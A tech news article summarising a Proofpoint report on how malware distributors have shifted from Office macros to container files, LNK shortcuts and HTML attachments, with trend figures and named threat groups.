Microsoft blocked malicious macros, but hackers have found another way

Crooks are finding new ways to distribute malware following Microsoft macro crackdown

When you purchase through links on our site, we may earn an affiliate commission.Here’s how it works.

Now thatmacros in downloaded Microsoft Office files are officially dead, it was only a matter of time before hackers came up with a new scheme.

According to cybersecurity experts Proofpoint, they’ve found not one, not two, but three new methods to get victims to downloadmalware.

The company’s latest report says that instead of macro-laden Office files, which are now on a significant decline, crooks are going for container files, shortcuts, and HTML files.

Shortcuts spiking

From October 2021 until today, the number of macro-powered Office files used to distribute malware drooped by a whopping two-thirds (66%). On the other hand, the use of container files (ISO files, ZIP, RAR files, and similar) rose by approximately 175%. Container files are a great way to avoidantivirussolutions, and if they also come with a password, their perceived legitimacy grows that much bigger.

As for shortcut files (.LNK), their use exploded in February 2022, rising by 1,675% since October the year before. Proofpoint says that ten separate threat actors are now favoring shortcut files to distribute malware, and that includes some of the heavy-hitters like Emotet, Qbot, or IcedID.

The icons of the shortcut files can be changed to virtually anything, helping crooks masquerade these files as PDFs, or Word documents.

Uh oh, malicious Windows shortcuts are making a return>Hackers have found a sneaky new way to infect Windows devices>Looking for the best secure email providers? Look no further

They’re also quite potent, as they can execute almost any command for which the victim has permission, including the execution of PowerShell scripts which, in this particular case, the crooks use to get people to download malware from the internet.

Are you a pro? Subscribe to our newsletter

Sign up to the TechRadar Pro newsletter to get all the top news, opinion, features and guidance your business needs to succeed!

Proofpoint is also saying there’s been a noticeable rise in the use of HTML attachments, as these types of files can also be used to drop malware on targetendpoints, while avoiding email security systems. Still, HTML attachments have relatively low volume, especially compared to container files and shortcuts. Whether or not that changes in the future, remains to be seen.

Via:BleepingComputer

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.

This new phishing strategy utilizes GitHub comments to distribute malware

Should your VPN always be on?

NYT Strands today — hints, answers and spangram for Sunday, November 10 (game #252)